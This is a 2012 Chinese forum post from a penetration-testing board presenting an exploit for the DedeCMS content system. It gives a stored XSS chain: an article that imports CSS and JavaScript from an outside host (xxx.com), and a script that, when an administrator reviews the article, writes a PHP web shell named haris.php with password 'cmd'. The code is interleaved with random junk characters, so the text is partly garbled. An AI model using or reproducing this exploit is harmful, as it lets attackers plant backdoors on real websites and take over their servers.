找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2272|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell! \' n- M1 V! ?- p) x' S" Q
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)3 s- C9 Z% k+ K3 ^( k
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。0 |) f% h; q! n( T( g
下面说说利用方法。
/ {% R/ s% i$ R0 }' @条件有2个:) T, f: t. L( G( c4 J
1.开启注册
# @0 j" _& u; w2.开启投稿
6 [8 T+ j! S% z注册会员----发表文章
& x- e- \/ O5 u, S; U内容填写:
+ @1 H9 Q+ u5 [: b" `7 _复制代码0 a/ z) ~* o; ]3 s( Q. }% m4 p
<style>@im\port'\http://xxx.com/xss.css';</style># q/ E" `' s. E# C. q! q' G! q; ?
新建XSS.Css) z$ Q& p( l. o' T6 \9 |
复制代码: ~1 A! F0 l( [( @
.body{
) Q% H2 `5 J% l( Gbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }/ t7 j! X+ {1 l- ]. [
新建xss.js 内容为# n2 z. \0 e& W5 n$ `8 @4 g
复制代码6 S+ A! W; `# S8 I; w/ M, v9 z" s; S7 q
1.var request = false;
( l  w" @" b+ F) h1 E3 k- z& W; }5 t2.if(window.XMLHttpRequest) {/ p5 R' A9 u/ j1 O+ M1 [
3.request = new XMLHttpRequest();6 }+ U1 Z- p. y: O
4.if(request.overrideMimeType) {
7 F2 V- |4 Q. o) i0 M0 m5.request.overrideMimeType('text/xml');
& G5 E5 \% z( {6 D( p6 }, y- ~; i6.}
" K- ?9 G: @6 ?2 ]2 `7.} else if(window.ActiveXObject) {% z/ f, v6 H6 ^. e
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
% X4 r! r# }3 _# K1 K9.for(var i=0; i<versions.length; i++) {8 g9 i7 [; Q5 G& ^& A# Z  h
10.try {
, z3 d, [& u4 a; x" g+ x! C11.request = new ActiveXObject(versions);6 O: W' t2 y8 ?/ n$ [4 W2 G( z$ @
12.} catch(e) {}2 }* T/ O2 \  F$ {! y
13.}$ M" ]" i* b! `; M" T4 Z, j% y. J. z
14.}
0 h1 L  |" U. m+ I/ p15.xmlhttp=request;0 J" |/ B+ X' v+ g
16.function getFolder( url ){
# O' j$ f. _6 r4 h' Y17. obj = url.split('/')# I/ Q6 I/ F' c; h
18. return obj[obj.length-2]' i0 I2 d7 [1 P4 L& P  W# c5 N
19.}
) |: s% A7 B. v1 _. |! |, p4 s  x20.oUrl = top.location.href;/ f+ o) M+ I! ?
21.u = getFolder(oUrl);
& n7 E5 G6 Q2 i& w' \22.add_admin();
( b* l& U2 G# u* K$ W23.function add_admin(){( s; ?$ L( `6 J
24.var url= "/"+u+"/sys_sql_query.php";
/ w: @1 b6 N0 x* W% l& {7 N25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
; i. @- t4 |! O' c( O26.xmlhttp.open("POST", url, true);/ C/ Y7 [5 y  {) Y; v  G1 w" u
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");$ N3 i7 {& ?4 m0 q9 I. T
28.xmlhttp.setRequestHeader("Content-length", params.length);" O  k# O1 R9 R
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");% e' ^6 D# y. A) C
30.xmlhttp.send(params);  _0 U- ?& e4 ?4 h0 ]
31.}
7 n# e3 ~- |+ _当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表